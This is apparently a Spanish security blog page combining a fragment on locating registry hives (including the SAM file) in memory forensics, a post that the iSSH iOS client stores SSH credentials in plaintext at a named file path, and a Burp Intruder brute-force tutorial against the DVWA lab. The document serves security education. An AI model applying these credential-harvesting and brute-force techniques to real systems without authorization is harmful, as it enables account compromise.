0x91f2d9d0  0x13b949d0  \??\C:\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat
0x963bf008  0x1fa36008  \SystemRoot\System32\Config\SAM

Obtener rutas de registro del registro del sistema
También puede obtener una lista de archivos de registro se han cargado por el sistema de control en la :

Código:

"SYSTEM \ CurrentControlSet \ Control \ Hivelist" tecla [1]

viernes, 16 de diciembre de 2011

iSSH no cifra las credenciales de acceso a servidores

Hace tiempo nos preocupabamos por la seguridad de las contraseñas en clientes como Filezilla, donde con solo acceder a un fichero XML era posible ver qué contraseñas estaban allí guardadas. Este problema es común a muchas aplicaciones que acaban instaladas en nuestros dispositvos móviles, y ayer mismo en Dragonjar explicaban este mismo problema pero con otra aplicación: El cliente iSSH.

iSSH es uno de los más populares, si no el más popular sí que el más descargado de la App Store, clientes SSH para dispositivos con iOS, y tal y como se puede ver en la imagen inferiro, NO CIFRA las claves, por lo que cualquier persona que pueda acceder al archivo /private/var/mobile/Applications/[número_aleatorio]/Library/Preferences/config.dat del dispositivo puede ver en texto claro el usuario, la passowrd y la dirección del servidor.

Sí, hay que acceder al dispositivo o al backup, pero en caso de extravío o robo, podría darse esta situación. Usar un cifrado con clave maestra para el almacenamiento de todas las credenciales hubiera sido lo recomendable. La pregunta que nos surge es, ¿cuántas aplicacions almacenan los datos así, de forma insegura?

Este problema nos llama la atención porque es una aplicación dirigida, comunmente, a administradores de sistemas, responsables de seguridad o técnicos profesionales. Sin embargo, en el resto de aplicaciones dedicadas a usuarios no técnicos, esta es una práctima más que aceptada, y que permite que un análisis forense de un iPhone obtenga petróleo de un terminal.

Uso de Burp Intruder para ataques de diccionario y fuerza bruta

Existen múltiples herramientas para ejecutar ataques de fuerza bruta contra aplicaciones web. Vamos a ver una forma de realizar esta operativa con una bastante potente, Burp Intruder, incluida en BurpSuite. Con ella se pueden automatizar varios procesos, como el de obtención de credenciales de acceso de una aplicación, búsqueda de valores aceptados en los parámetros de una petición (vayan por GET o por POST), ataques de inyección de código, descubrimiento de directorios... vamos, en general, un completo fuzzer para web. Para mostrar su uso, la explicación se centrará en hacer un ataque de diccionario, utilizando como víctima el panel de identificación de DVWA.

Para empezar, se debe activar el Burp Proxy, también incluido en la suite, así como preparar el navegador para ir a través del proxy. Una vez se tenga seleccionada la petición que contiene los parámetros, bien por intercepción (intercept) o desde el histórico (history), habrá que pulsar el botón derecho y pinchar en “send to intruder”, cuya pestaña se pondrá en color rojo.

Menú contextual que aparece al hacer clic con el botón
derecho en la petición que contiene los parámetros

Situándose en la pestaña intruder, se observan debajo 4 nuevas pestañas, que son las que se deberán personalizar para cada tipo de ataque. Generalmente, no es necesario modificar nada en la pestaña target en el que viene especificado el objetivo. En positions, habrá que indicar dos aspectos: el tipo de ataque que se desea realizar y sobre qué parámetros se aplicará.

Los parámetros se eligen con los botones de la parte derecha (add, clear, auto y refresh). Por defecto suelen marcarse algunos. Lo mejor es hacer click en clear e ir seleccionando uno a uno los que interesen cada vez.

Los tipos de ataque (attack type) posibles son:

Sniper
Battering ram
Pitchfork
Cluster bomb

Sniper: En este tipo de ataque, se fijarán todos los parámetros excepto uno, en el que se probarán todas las opciones posibles del payload seleccionado. Una vez finalizado para ese parámetro, tomará el valor que recibió en la petición original e irá variando el siguiente parámetro. Así hasta haber completado el proceso para todos los parámetros seleccionados.

En position se indica el parámetro sobre el que se está aplicando el payload.
En este ejemplo, el parámetro 1 es username y el 2 password.

Battering ram: Permite la carga de un único payload por lo que, si hay más de un parámetro, se utilizarán los mismos datos en todas las posiciones simultáneamente.

Ejemplo de uso del mismo payload en ambos parámetros.

Pitchfork: Se prueba cada entrada del payload con su correspondiente en orden del resto de bloques de datos, es decir, el primer elemento del payload de la primera posición con el primer elemento del de la segunda posición marcada, el segundo con el segundo, y así sucesivamente.

Cluster bomb: En este caso, teniendo varias posiciones en las que automatizar el proceso, el ataque se realizará de manera que se prueben todos los valores de un parámetro contra todas las posibles combinaciones de valores del resto.

Como se puede intuir, en caso de tener una sola posición que automatizar, dará lo mismo el tipo de ataque seleccionado, ya que en todos los casos se permitirá elegir un solo payload con el que ejecutar el ataque.

La selección del payload dependerá del tipo de dato que se quiera utilizar. Las opciones que ofrece Intruder son amplias: desde la carga de diccionarios, hasta la selección de caracteres para efectuar una fuerza bruta clásica, pasando por fechas o generador en base a una cadena dada. Además, pueden realizarse operaciones sobre los datos seleccionados, como codificación en Base64 o aplicación de funciones hash.

Desde "payload set" se selecciona el tipo de dato que se utilizará como entrada, dinámico o diccionario.
En "payload processing rules" se puede seleccionar la operación a realizar sobre el tipo de dato.

Normalmente, se sabrá que el ataque ha tenido éxito por alguno de los siguientes aspectos:

La respuesta del servidor (status): el servidor devuelve distintos códigos en función de tener éxito o no tenerlo.
La longitud de la respuesta cuando el status no varía (length): Los casos de éxito tienen un longitud de respuesta diferente al resto.
Otros factores.

En este ejemplo, aplica el tercer caso, ya que hasta que no se envía la petición que se había interceptado con el proxy (una vez ya finalizado el ataque), no se muestra el contenido de las respuestas, teniendo que retornar a la ventana del ataque, para ver qué posición ocupa la petición exitosa, algo incómodo, todo sea dicho de paso.

Pero lo normal es que salga algo similar a esto donde tanto la respuesta del servidor como la longitud varían respecto al resto de opciones:

BurpSuite ofrece dos versiones, una gratuita y otra de pago. Las diferencias entre ellas las podéis ver en la página oficial: http://portswigger.net/burp/download.html, pero os avanzo que para el intruder la diferencia radica en la velocidad de ejecución del ataque, ralentizado para la versión free.